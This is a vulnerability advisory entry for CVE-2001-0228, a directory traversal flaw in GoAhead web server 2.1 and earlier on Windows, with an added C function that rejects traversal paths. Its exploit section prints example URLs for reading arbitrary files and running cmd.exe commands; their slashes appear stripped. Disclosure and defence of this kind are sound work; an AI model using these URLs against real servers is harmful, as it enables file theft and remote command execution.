GoAhead web server directory traversal vulnerability

Vulnerability ID 1106200 Vulnerability type Path traversal
Published 2001-02-02 Updated 2001-05-03
CVE ID CVE-2001-0228
CNNVD-ID CNNVD-200105-040
Platform Windows CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20607
https://www.securityfocus.com/bid/88638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-040
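|Vulnerability details
GoAhead web server 2.1 and earlier versions contain a directory traversal vulnerability. A remote attacker can read arbitrary files by using a .. attack in an HTTP GET request.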
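
One way to write the request-path check that refuses this class of request, as an added example (it is not GoAhead's code and not part of the original advisory). It decodes percent-escapes once, treats both `/` and `\` as separators because the affected platform is Windows, and rejects any dot-only segment; the function name `request_path_is_safe` and the 1024-byte limit are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)tolower((unsigned char)c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/*
 * Hypothetical helper (not GoAhead's API). url_path is the path part of the
 * request line, without the query string. Returns 1 if it may be mapped
 * under the document root, 0 if the request must be refused.
 */
int request_path_is_safe(const char *url_path) {
    char buf[1024];               /* assumed upper bound on path length */
    size_t n = 0;

    /* Decode %XX exactly once, before any check is made. */
    for (const char *p = url_path; *p; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            int hi = hex_val(p[1]);
            int lo = (hi < 0) ? -1 : hex_val(p[2]);
            if (lo < 0) return 0;             /* malformed escape */
            c = hi * 16 + lo;
            p += 2;
        }
        if (c == 0 || n + 1 >= sizeof buf) return 0;  /* NUL or too long */
        buf[n++] = (c == '\\') ? '/' : (char)c;  /* '\' separates on Windows */
    }
    buf[n] = '\0';

    /* Must be rooted; ':' would allow drive letters and NTFS streams. */
    if (buf[0] != '/' || strchr(buf, ':') != NULL) return 0;

    /* Refuse any segment made only of dots and spaces ("..", "...", ".. "):
     * Win32 strips trailing dots and spaces from path components. */
    for (const char *seg = buf; *seg != '\0'; ) {
        seg++;                                /* step over '/' */
        size_t len = strcspn(seg, "/");
        if (len >= 2 && strspn(seg, ". ") == len) return 0;
        seg += len;
    }
    return 1;
}
```

The check runs on the decoded path, so the same decoded buffer, not the raw URL, is what should then be joined to the document root.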
|Exploit
source: http://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

Gaining access to a known file:

http://target/............filename

Executing arbitrary commands:

http://target/cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
|Affected products
GoAhead Software GoAhead Webserver (Windows) V.2.0

GoAhead Software GoAhead WebServer v.2.1

|References

Source: BUGTRAQ
Name: 20010202 GoAhead Web Server Directory Traversal Vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2001-02/0022.html
